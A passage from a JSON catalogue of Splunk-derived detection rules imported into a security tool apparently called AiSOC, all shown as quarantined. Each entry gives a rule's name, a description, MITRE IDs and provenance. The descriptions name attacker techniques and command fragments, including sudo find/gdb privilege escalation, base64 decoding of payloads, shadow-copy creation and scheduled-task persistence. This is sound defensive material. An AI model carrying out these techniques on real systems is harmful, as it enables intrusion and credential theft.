arbitrary code, maintain persistence, and evade detection by blending with legitimate processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlwriter-sqldumper-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ed89ba9-c6c7-46aa-9f08-a2a1c2955aa3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlwriter_sqldumper_dll_sideload.yml" } }, { "id": "splunk-security-content-2ed8b538-d284-449a-be1d-82ad1dbd186b", "type": "detection", "name": "Creation of Shadow Copy with wmic and powershell", "description": "The following analytic detects the creation of shadow copies using \"wmic\" or \"Powershell\" commands. It leverages the Endpoint.Processes data model in Splunk to identify processes where the command includes \"shadowcopy\" and \"create\". This activity is significant because it may indicate an attacker attempting to manipulate or access data in an unauthorized manner, potentially leading to data theft or manipulation. If confirmed malicious, this behavior could allow attackers to backup and exfiltrate sensitive data or hide their tracks by restoring files to a previous state after an attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/creation-of-shadow-copy-with-wmic-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ed8b538-d284-449a-be1d-82ad1dbd186b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml" } }, { "id": "splunk-security-content-2eed004c-4c0d-11ec-93e8-3e22fbd008af", "type": "detection", "name": "Wsmprovhost LOLBAS Execution Process Spawn", "description": "The following analytic identifies `Wsmprovhost.exe` spawning a LOLBAS execution process. It leverages Endpoint Detection and Response (EDR) data to detect when `Wsmprovhost.exe` spawns child processes that are known LOLBAS (Living Off the Land Binaries and Scripts) executables. This activity is significant because it may indicate an adversary using Windows Remote Management (WinRM) to execute code on remote endpoints, a common technique for lateral movement. If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wsmprovhost-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2eed004c-4c0d-11ec-93e8-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-2f0604c6-6030-11eb-ae93-0242ac130002", "type": "detection", "name": "AWS SAML Update identity provider", "description": "The following analytic detects updates to the SAML provider in AWS. It leverages AWS CloudTrail logs to identify the `UpdateSAMLProvider` event, analyzing fields such as `sAMLProviderArn`, `sourceIPAddress`, and `userIdentity` details. Monitoring updates to the SAML provider is crucial as it may indicate a perimeter compromise of federated credentials or unauthorized backdoor access set by an attacker. If confirmed malicious, this activity could allow attackers to manipulate identity federation, potentially leading to unauthorized access to cloud resources and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-saml-update-identity-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f0604c6-6030-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_saml_update_identity_provider.yml" } }, { "id": "splunk-security-content-2f15e1a4-0fc2-49dd-919e-cbbe60699218", "type": "detection", "name": "Windows Scheduled Task with Highest Privileges", "description": "The following analytic detects the creation of a new scheduled task with the highest execution privileges via Schtasks.exe. It leverages Endpoint Detection and Response (EDR) logs to monitor for specific command-line parameters ('/rl' and 'highest') in schtasks.exe executions. This activity is significant as it is commonly used in AsyncRAT attacks for persistence and privilege escalation. If confirmed malicious, this could allow an attacker to maintain persistent access and execute tasks with elevated privileges, potentially leading to unauthorized system access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-highest-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f15e1a4-0fc2-49dd-919e-cbbe60699218", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_highest_privileges.yml" } }, { "id": "splunk-security-content-2f1c5fd1-4b8a-4f5d-a0e9-7d6a8e2f5e1e", "type": "detection", "name": "Detect DNS Query to Decommissioned S3 Bucket", "description": "This detection identifies DNS queries to domains that match previously decommissioned S3 buckets. This activity is significant because attackers may attempt to recreate deleted S3 buckets that were previously public to hijack them for malicious purposes. If successful, this could allow attackers to host malicious content or exfiltrate data through compromised bucket names that may still be referenced by legitimate applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-dns-query-to-decommissioned-s3-bucket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f1c5fd1-4b8a-4f5d-a0e9-7d6a8e2f5e1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_dns_query_to_decommissioned_s3_bucket.yml" } }, { "id": "splunk-security-content-2f3862c6-45ff-4a02-9bd4-7e25c209fcd9", "type": "detection", "name": "Cisco SD-WAN - Arbitrary File Overwrite Exploitation Activity", "description": "This analytic detects a exploitation activity attempts of targeting Cisco Catalyst SD-WAN Manager.\nIt leverages the \"serviceproxy_access.log\" and identifies source-host combinations that perform all key stages of the exploitation as reported in public POCs in a short period: authentication/config collection (`.dca`), upload actions (`uploadAck`), and payload-style access (`.gz/*`).\nThe behavior can indicate attempted exploitation activity associated with Cisco Catalyst SD-WAN Manager vulnerabilities CVE-2026-20122 (Arbitrary File Overwrite) and CVE-2026-20128 (Information Disclosure).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-arbitrary-file-overwrite-exploitation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f3862c6-45ff-4a02-9bd4-7e25c209fcd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___arbitrary_file_overwrite_exploitation_activity.yml" } }, { "id": "splunk-security-content-2f3a4092-548b-421c-9caa-84918e1787ef", "type": "detection", "name": "Windows App Layer Protocol Wermgr Connect To NamedPipe", "description": "The following analytic detects the wermgr.exe process creating or connecting to a named pipe. It leverages Sysmon EventCodes 17 and 18 to identify these actions. This activity is significant because wermgr.exe, a legitimate Windows OS Problem Reporting application, is often abused by malware such as Trickbot and Qakbot to execute malicious code. If confirmed malicious, this behavior could indicate that an attacker has injected code into wermgr.exe, potentially allowing them to communicate covertly, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-app-layer-protocol-wermgr-connect-to-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f3a4092-548b-421c-9caa-84918e1787ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_app_layer_protocol_wermgr_connect_to_namedpipe.yml" } }, { "id": "splunk-security-content-2f4abe6d-5991-464d-8216-f90f42999764", "type": "detection", "name": "Kubernetes Access Scanning", "description": "The following analytic detects potential scanning activities within a Kubernetes environment. It identifies unauthorized access attempts, probing of public APIs, or attempts to exploit known vulnerabilities by monitoring Kubernetes audit logs for repeated failed access attempts or unusual API requests. This activity is significant for a SOC as it may indicate an attacker's preliminary reconnaissance to gather information about the system. If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-access-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2f4abe6d-5991-464d-8216-f90f42999764", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_access_scanning.yml" } }, { "id": "splunk-security-content-2fa9dec8-9d8e-46d3-96c1-202c06f0e6e1", "type": "detection", "name": "Windows Phishing PDF File Executes URL Link", "description": "The following analytic detects suspicious PDF viewer processes spawning browser application child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names. This activity is significant as it may indicate a PDF spear-phishing attempt where a malicious URL link is executed, leading to potential payload download. If confirmed malicious, this could allow attackers to execute code, escalate privileges, or persist in the environment by exploiting the user's browser to connect to a malicious site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-pdf-file-executes-url-link.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2fa9dec8-9d8e-46d3-96c1-202c06f0e6e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml" } }, { "id": "splunk-security-content-2fcbce12-cffa-4c84-b70c-192604d201d0", "type": "detection", "name": "PingID New MFA Method After Credential Reset", "description": "The following analytic identifies the provisioning of a new MFA device shortly after a password reset. It detects this activity by correlating Windows Event Log events for password changes (EventID 4723, 4724) with PingID logs indicating device pairing. This behavior is significant as it may indicate a social engineering attack where a threat actor impersonates a valid user to reset credentials and add a new MFA device. If confirmed malicious, this activity could allow an attacker to gain persistent access to the compromised account, bypassing traditional security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-new-mfa-method-after-credential-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2fcbce12-cffa-4c84-b70c-192604d201d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_new_mfa_method_after_credential_reset.yml" } }, { "id": "splunk-security-content-2ff4e0c2-8256-4143-9c07-1e39c7231111", "type": "detection", "name": "Linux Find Privilege Escalation", "description": "The following analytic detects the use of the 'find' command with 'sudo' and '-exec' options, which can indicate an attempt to escalate privileges on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line arguments. This activity is significant because it can allow a user to execute system commands as root, potentially leading to a root shell. If confirmed malicious, this could enable an attacker to gain full control over the system, leading to severe security breaches and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-find-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ff4e0c2-8256-4143-9c07-1e39c7231111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_find_privilege_escalation.yml" } }, { "id": "splunk-security-content-300688e4-365c-4486-a065-7c884462b31d", "type": "detection", "name": "AWS ECR Container Upload Unknown User", "description": "The following analytic detects the upload of a new container image to AWS Elastic Container Registry (ECR) by an unknown user. It leverages AWS CloudTrail logs to identify `PutImage` events from the ECR service, filtering out known users. This activity is significant because container uploads should typically be performed by a limited set of authorized users. If confirmed malicious, this could indicate unauthorized access, potentially leading to the deployment of malicious containers, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-upload-unknown-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "300688e4-365c-4486-a065-7c884462b31d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_upload_unknown_user.yml" } }, { "id": "splunk-security-content-3032741c-d6fc-4c69-8988-be8043d6478c", "type": "detection", "name": "Windows Impair Defense Disable Controlled Folder Access", "description": "The following analytic detects a modification in the Windows registry that disables the Windows Defender Controlled Folder Access feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the EnableControlledFolderAccess registry setting. This activity is significant because Controlled Folder Access is designed to protect critical folders from unauthorized access, including ransomware attacks. If this activity is confirmed malicious, it could allow attackers to bypass a key security feature, potentially leading to unauthorized access or modification of sensitive files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-controlled-folder-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3032741c-d6fc-4c69-8988-be8043d6478c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_controlled_folder_access.yml" } }, { "id": "splunk-security-content-303b38b2-c03f-44e2-8f41-4594606fcfc7", "type": "detection", "name": "Linux Obfuscated Files or Information Base64 Decode", "description": "The following analytic detects the use of the base64 decode command on Linux systems, which is often used to deobfuscate files. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include \"base64 -d\" or \"base64 --decode\". This activity is significant as it may indicate an attempt to hide malicious payloads or scripts. If confirmed malicious, an attacker could use this technique to execute hidden code, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-obfuscated-files-or-information-base64-decode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "303b38b2-c03f-44e2-8f41-4594606fcfc7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_obfuscated_files_or_information_base64_decode.yml" } }, { "id": "splunk-security-content-309d59dc-1e1b-49b2-9800-7cf18d12f7b7", "type": "detection", "name": "Linux Iptables Firewall Modification", "description": "The following analytic detects suspicious command-line activity that modifies the iptables firewall settings on a Linux machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command patterns that alter firewall rules to accept traffic on certain TCP ports. This activity is significant as it can indicate malware, such as CyclopsBlink, modifying firewall settings to allow communication with a Command and Control (C2) server. If confirmed malicious, this could enable attackers to maintain persistent access and exfiltrate data, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-iptables-firewall-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "309d59dc-1e1b-49b2-9800-7cf18d12f7b7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_iptables_firewall_modification.yml" } }, { "id": "splunk-security-content-30a0e9f8-f1dd-4f9d-8fc2-c622461d781c", "type": "detection", "name": "AWS ECR Container Scanning Findings High", "description": "The following analytic identifies high-severity findings from AWS Elastic Container Registry (ECR) image scans. It detects these activities by analyzing AWS CloudTrail logs for the DescribeImageScanFindings event, specifically filtering for findings with a high severity level. This activity is significant for a SOC because high-severity vulnerabilities in container images can lead to potential exploitation if not addressed. If confirmed malicious, attackers could exploit these vulnerabilities to gain unauthorized access, execute arbitrary code, or escalate privileges within the container environment, posing a significant risk to the overall security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-high.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30a0e9f8-f1dd-4f9d-8fc2-c622461d781c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_high.yml" } }, { "id": "splunk-security-content-30a334c1-f9a5-4fbd-8958-5b65a8435cb2", "type": "detection", "name": "Windows Default Rdp File Deletion", "description": "This detection identifies the deletion of the Default.rdp file from a user\u2019s Documents folder. This file is automatically created or updated by the Remote Desktop Connection client (mstsc.exe) whenever a user initiates an RDP session. It contains session configuration data, such as the remote hostname and display settings. While the presence of this file is normal during legitimate RDP usage, its deletion may indicate an attempt to conceal evidence of remote access activity. Threat actors and red team operators often remove Default.rdp as part of post-access cleanup to evade forensic detection. Detecting this action\u2014especially when correlated with recent RDP activity\u2014can help identify defense evasion techniques and uncover potentially malicious use of remote desktop connections. Monitoring for this file's deletion adds an important layer of visibility into user behavior and can serve as an early indicator of interactive attacker presence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30a334c1-f9a5-4fbd-8958-5b65a8435cb2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_deletion.yml" } }, { "id": "splunk-security-content-30c32c5c-41fe-45db-84fe-275e4320da3f", "type": "detection", "name": "Windows Alternate DataStream - Process Execution", "description": "The following analytic detects when a process attempts to execute a file from within an NTFS file system alternate data stream. This detection leverages process execution data from sources like Windows process monitoring or Sysmon Event ID 1, focusing on specific processes known for such behavior. This activity is significant because alternate data streams can be used by threat actors to hide malicious code, making it difficult to detect. If confirmed malicious, this could allow an attacker to execute hidden code, potentially leading to unauthorized actions and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30c32c5c-41fe-45db-84fe-275e4320da3f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___process_execution.yml" } }, { "id": "splunk-security-content-30c47f45-dd6a-4720-9963-0bca6c8686ef", "type": "detection", "name": "Azure AD New Custom Domain Added", "description": "The following analytic detects the addition of a new custom domain within an Azure Active Directory (AD) tenant. It leverages Azure AD AuditLogs to identify successful \"Add unverified domain\" operations. This activity is significant as it may indicate an adversary attempting to establish persistence by setting up identity federation backdoors, allowing them to impersonate users and bypass authentication mechanisms. If confirmed malicious, this could enable attackers to gain unauthorized access, escalate privileges, and maintain long-term access to the Azure AD environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-custom-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "30c47f45-dd6a-4720-9963-0bca6c8686ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_custom_domain_added.yml" } }, { "id": "splunk-security-content-310b7da2-ab52-437f-b1bf-0bd458674308", "type": "detection", "name": "Linux GDB Privilege Escalation", "description": "The following analytic detects the execution of the GNU Debugger (GDB) with specific flags that indicate an attempt to escalate privileges on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes where GDB is run with the `-nx`, `-ex`, and `sudo` flags. This activity is significant because it can allow a user to execute system commands as root, potentially leading to a root shell. If confirmed malicious, this could result in full system compromise, allowing an attacker to gain complete control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gdb-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "310b7da2-ab52-437f-b1bf-0bd458674308", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gdb_privilege_escalation.yml" } }, { "id": "splunk-security-content-31302468-93c9-4eca-9ae3-2d41f53a4e2b", "type": "detection", "name": "Windows Security Support Provider Reg Query", "description": "The following analytic identifies command-line activity querying the registry for Security Support Providers (SSPs) related to Local Security Authority (LSA) protection and configuration. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on processes accessing specific LSA registry paths. Monitoring this activity is crucial as adversaries and post-exploitation tools like winpeas may use it to gather information on LSA protections, potentially leading to credential theft. If confirmed malicious, attackers could exploit this to scrape password hashes or plaintext passwords from memory, significantly compromising system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-support-provider-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "31302468-93c9-4eca-9ae3-2d41f53a4e2b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_support_provider_reg_query.yml" } }, { "id": "splunk-security-content-313681a2-da8e-11eb-adad-acde48001122", "type": "detection", "name": "Print Spooler Adding A Printer Driver", "description": "The following analytic detects the addition of new printer drivers by monitoring Windows PrintService operational logs, specifically EventCode 316. This detection leverages log data to identify messages indicating the addition or update of printer drivers, such as \"kernelbase.dll\" and \"UNIDRV.DLL.\" This activity is significant as it may indicate exploitation attempts related to vulnerabilities like CVE-2021-34527 (PrintNightmare). If confirmed malicious, attackers could gain code execution or escalate privileges, potentially compromising the affected system. Immediate isolation and investigation of the endpoint are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-spooler-adding-a-printer-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "313681a2-da8e-11eb-adad-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_spooler_adding_a_printer_driver.yml" } }, { "id": "splunk-security-content-3141a041-4f57-4277-9faa-9305ca1f8e5b", "type": "detection", "name": "Internal Horizontal Port Scan NMAP Top 20", "description": "This analytic identifies instances where an internal host has attempted to communicate with 250 or more destination IP addresses using on of the NMAP top 20 ports. Horizontal port scans from internal hosts can indicate reconnaissance or scanning activities, potentially signaling malicious intent or misconfiguration. By monitoring network traffic logs, this detection helps detect and respond to such behavior promptly, enhancing network security and preventing potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-horizontal-port-scan-nmap-top-20.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3141a041-4f57-4277-9faa-9305ca1f8e5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_horizontal_port_scan_nmap_top_20.yml" } }, { "id": "splunk-security-content-314cb263-7eeb-4d45-b693-bb21699c73d2", "type": "detection", "name": "Windows Chromium Browser No Security Sandbox Process", "description": "The following analytic detects instances where a Chrome or Chromium-based browser is launched with the --no-sandbox flag, a known indicator of potentially malicious or suspicious behavior. While 